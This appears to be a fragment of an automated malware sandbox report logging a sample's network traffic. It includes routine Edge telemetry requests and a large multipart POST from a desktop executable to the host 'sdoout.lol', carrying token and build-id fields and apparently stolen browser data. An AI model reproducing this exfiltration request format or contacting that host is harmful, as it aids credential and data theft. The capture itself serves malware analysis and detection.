                                                                                                                                                                                                                                                                                          2024-12-30 14:55:38 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                          2024-12-30 14:55:38 UTC16355OUTData Raw: 30 63 32 4e 79 5a 57 56 75 58 33 56 79 62 46 39 69 62 47 39 6a 61 33 4e 66 59 6e 6c 77 59 58 4e 7a 5a 57 52 66 59 32 39 31 62 6e 52 6c 63 69 42 4a 54 6c 52 46 52 30 56 53 4c 48 4e 74 59 58 4a 30 63 32 4e 79 5a 57 56 75 58 32 52 76 64 32 35 73 62 32 46 6b 58 32 4a 73 62 32 4e 72 63 31 39 6a 62 33 56 75 64 47 56 79 49 45 6c 4f 56 45 56 48 52 56 49 73 63 32 31 68 63 6e 52 7a 59 33 4a 6c 5a 57 35 66 5a 47 39 33 62 6d 78 76 59 57 52 66 59 6d 78 76 59 32 74 7a 58 32 4a 35 63 47 46 7a 63 32 56 6b 58 32 4e 76 64 57 35 30 5a 58 49 67 53 55 35 55 52 55 64 46 55 69 78 7a 62 57 46 79 64 48 4e 6a 63 6d 56 6c 62 6c 39 74 59 57 78 32 5a 58 4a 30 61 58 4e 70 62 6d 64 66 59 6d 78 76 59 32 74 7a 58 32 4e 76 64 57 35 30 5a 58 49 67 53 55 35 55 52 55 64 46 55 69 78 68 59 6e
                                                                                                                                                                                                                                                                                          Data Ascii: 0c2NyZWVuX3VybF9ibG9ja3NfYnlwYXNzZWRfY291bnRlciBJTlRFR0VSLHNtYXJ0c2NyZWVuX2Rvd25sb2FkX2Jsb2Nrc19jb3VudGVyIElOVEVHRVIsc21hcnRzY3JlZW5fZG93bmxvYWRfYmxvY2tzX2J5cGFzc2VkX2NvdW50ZXIgSU5URUdFUixzbWFydHNjcmVlbl9tYWx2ZXJ0aXNpbmdfYmxvY2tzX2NvdW50ZXIgSU5URUdFUixhYn
                                                                                                                                                                                                                                                                                          2024-12-30 14:55:38 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                          2024-12-30 14:55:39 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                          Date: Mon, 30 Dec 2024 14:55:39 GMT
                                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                          Connection: close


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          27192.168.2.953909108.139.47.334434108C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          2024-12-30 14:55:38 UTC925OUTGET /b?rn=1735570536847&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=0D1D943A7B9D67B72691815F7AEF6664&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null HTTP/1.1
                                                                                                                                                                                                                                                                                          Host: sb.scorecardresearch.com
                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                          sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                          Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                                          Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                          Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                                          2024-12-30 14:55:39 UTC955INHTTP/1.1 302 Found
                                                                                                                                                                                                                                                                                          Content-Length: 0
                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                          Date: Mon, 30 Dec 2024 14:55:38 GMT
                                                                                                                                                                                                                                                                                          Location: /b2?rn=1735570536847&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=0D1D943A7B9D67B72691815F7AEF6664&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null
                                                                                                                                                                                                                                                                                          set-cookie: UID=199467e39237cba6052fa631735570538; SameSite=None; Secure; domain=.scorecardresearch.com; path=/; max-age=33696000
                                                                                                                                                                                                                                                                                          set-cookie: XID=199467e39237cba6052fa631735570538; SameSite=None; Secure; Partitioned; domain=.scorecardresearch.com; path=/; max-age=33696000
                                                                                                                                                                                                                                                                                          Accept-CH: UA, Platform, Arch, Model, Mobile
                                                                                                                                                                                                                                                                                          X-Cache: Miss from cloudfront
                                                                                                                                                                                                                                                                                          Via: 1.1 005b0f8dc37e46fc9bdc40ea2ce8a602.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                                          X-Amz-Cf-Pop: JFK50-P1
                                                                                                                                                                                                                                                                                          X-Amz-Cf-Id: DBlvj8Hnc7d0p1FYdOg3XL8h9k1ufowp98GLotjlkzqyHBokF2T0Mg==


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          28192.168.2.95390820.110.205.1194434108C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          2024-12-30 14:55:38 UTC1175OUTGET /c.gif?rnd=1735570536847&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=68ae4f54c4b54ec091b4e816c09ceaa4&activityId=68ae4f54c4b54ec091b4e816c09ceaa4&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0 HTTP/1.1
                                                                                                                                                                                                                                                                                          Host: c.msn.com
                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                          sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                          Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                                          Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                          Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                                          Cookie: _C_ETH=1; USRLOC=; MUID=0D1D943A7B9D67B72691815F7AEF6664; _EDGE_S=F=1&SID=38B0BBDA67E56A6606D2AEBF66AE6B66; _EDGE_V=1
                                                                                                                                                                                                                                                                                          2024-12-30 14:55:39 UTC1108INHTTP/1.1 302 Redirect
                                                                                                                                                                                                                                                                                          Cache-Control: private, no-cache, proxy-revalidate, no-store
                                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                                          Location: https://c.bing.com/c.gif?rnd=1735570536847&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=68ae4f54c4b54ec091b4e816c09ceaa4&activityId=68ae4f54c4b54ec091b4e816c09ceaa4&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0&ctsa=mr&CtsSyncId=50901D4D6116491A952B6DE789F1FD6E&RedC=c.msn.com&MXFR=0D1D943A7B9D67B72691815F7AEF6664
                                                                                                                                                                                                                                                                                          Server: Microsoft-IIS/10.0
                                                                                                                                                                                                                                                                                          X-Powered-By: ASP.NET
                                                                                                                                                                                                                                                                                          P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
                                                                                                                                                                                                                                                                                          Set-Cookie: SM=T; domain=c.msn.com; path=/; SameSite=None; Secure;
                                                                                                                                                                                                                                                                                          Set-Cookie: MUID=0D1D943A7B9D67B72691815F7AEF6664; domain=.msn.com; expires=Sat, 24-Jan-2026 14:55:39 GMT; path=/; SameSite=None; Secure; Priority=High;
                                                                                                                                                                                                                                                                                          Date: Mon, 30 Dec 2024 14:55:38 GMT
                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                          Content-Length: 0


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          29192.168.2.95390520.189.173.84434108C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          2024-12-30 14:55:39 UTC1082OUTPOST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1735570536845&time-delta-to-apply-millis=use-collector-delta&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1
                                                                                                                                                                                                                                                                                          Host: browser.events.data.msn.com
                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                          Content-Length: 3869
                                                                                                                                                                                                                                                                                          sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                                          Content-Type: text/plain;charset=UTF-8
                                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                                          Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                          Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                          Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                                          Cookie: _C_ETH=1; USRLOC=; MUID=0D1D943A7B9D67B72691815F7AEF6664; _EDGE_S=F=1&SID=38B0BBDA67E56A6606D2AEBF66AE6B66; _EDGE_V=1
                                                                                                                                                                                                                                                                                          2024-12-30 14:55:39 UTC3869OUTData Raw: 7b 22 6e 61 6d 65 22 3a 22 4d 53 2e 4e 65 77 73 2e 57 65 62 2e 50 61 67 65 56 69 65 77 22 2c 22 74 69 6d 65 22 3a 22 32 30 32 34 2d 31 32 2d 33 30 54 31 34 3a 35 35 3a 33 36 2e 38 34 30 5a 22 2c 22 76 65 72 22 3a 22 34 2e 30 22 2c 22 69 4b 65 79 22 3a 22 6f 3a 30 64 65 64 36 30 63 37 35 65 34 34 34 34 33 61 61 33 34 38 34 63 34 32 63 31 63 34 33 66 65 38 22 2c 22 65 78 74 22 3a 7b 22 73 64 6b 22 3a 7b 22 76 65 72 22 3a 22 31 44 53 2d 57 65 62 2d 4a 53 2d 33 2e 32 2e 38 22 2c 22 73 65 71 22 3a 31 2c 22 69 6e 73 74 61 6c 6c 49 64 22 3a 22 61 63 33 38 35 63 63 37 2d 31 30 34 61 2d 34 36 39 39 2d 62 63 64 39 2d 38 37 34 63 32 63 61 31 38 30 37 63 22 2c 22 65 70 6f 63 68 22 3a 22 31 39 31 33 37 33 31 34 36 31 22 7d 2c 22 61 70 70 22 3a 7b 22 6c 6f 63 61 6c 65
                                                                                                                                                                                                                                                                                          Data Ascii: {"name":"MS.News.Web.PageView","time":"2024-12-30T14:55:36.840Z","ver":"4.0","iKey":"o:0ded60c75e44443aa3484c42c1c43fe8","ext":{"sdk":{"ver":"1DS-Web-JS-3.2.8","seq":1,"installId":"ac385cc7-104a-4699-bcd9-874c2ca1807c","epoch":"1913731461"},"app":{"locale
                                                                                                                                                                                                                                                                                          2024-12-30 14:55:39 UTC890INHTTP/1.1 204 No Content
                                                                                                                                                                                                                                                                                          Content-Length: 0
                                                                                                                                                                                                                                                                                          Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                          P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
                                                                                                                                                                                                                                                                                          Set-Cookie: MC1=GUID=b6d17f6b950c4575815743e247ec4328&HASH=b6d1&LV=202412&V=4&LU=1735570539230; Domain=.microsoft.com; Expires=Tue, 30 Dec 2025 14:55:39 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                                          Set-Cookie: MS0=6d9149f726ff441686106f96a8250091; Domain=.microsoft.com; Expires=Mon, 30 Dec 2024 15:25:39 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                                          time-delta-millis: 2385
                                                                                                                                                                                                                                                                                          Access-Control-Allow-Headers: P3P,Set-Cookie,time-delta-millis
                                                                                                                                                                                                                                                                                          Access-Control-Allow-Methods: POST
                                                                                                                                                                                                                                                                                          Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                                                          Access-Control-Allow-Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                                          Access-Control-Expose-Headers: time-delta-millis
                                                                                                                                                                                                                                                                                          Date: Mon, 30 Dec 2024 14:55:38 GMT
                                                                                                                                                                                                                                                                                          Connection: close


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          30192.168.2.953913116.203.14.44437428C:\Users\user\Desktop\BHgwhz3lGN.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          2024-12-30 14:55:39 UTC278OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----9rimyc2dt2ngvaieukfk
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                                                                                                                          Host: sdoout.lol
                                                                                                                                                                                                                                                                                          Content-Length: 393697
                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                          2024-12-30 14:55:39 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 39 72 69 6d 79 63 32 64 74 32 6e 67 76 61 69 65 75 6b 66 6b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 66 34 39 31 31 31 32 61 62 62 66 33 35 64 37 64 35 34 64 62 66 32 62 38 39 65 62 31 31 30 38 0d 0a 2d 2d 2d 2d 2d 2d 39 72 69 6d 79 63 32 64 74 32 6e 67 76 61 69 65 75 6b 66 6b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 64 30 37 31 33 65 32 36 63 35 30 34 64 35 39 30 37 36 37 39 32 32 31 62 38 63 35 39 65 36 63 0d 0a 2d 2d 2d 2d 2d 2d 39 72 69 6d 79 63 32 64 74 32 6e 67 76 61 69 65 75 6b 66 6b 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                          Data Ascii: ------9rimyc2dt2ngvaieukfkContent-Disposition: form-data; name="token"9f491112abbf35d7d54dbf2b89eb1108------9rimyc2dt2ngvaieukfkContent-Disposition: form-data; name="build_id"cd0713e26c504d5907679221b8c59e6c------9rimyc2dt2ngvaieukfkCont
                                                                                                                                                                                                                                                                                          2024-12-30 14:55:39 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                          2024-12-30 14:55:39 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                          2024-12-30 14:55:39 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                          2024-12-30 14:55:39 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                          2024-12-30 14:55:39 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
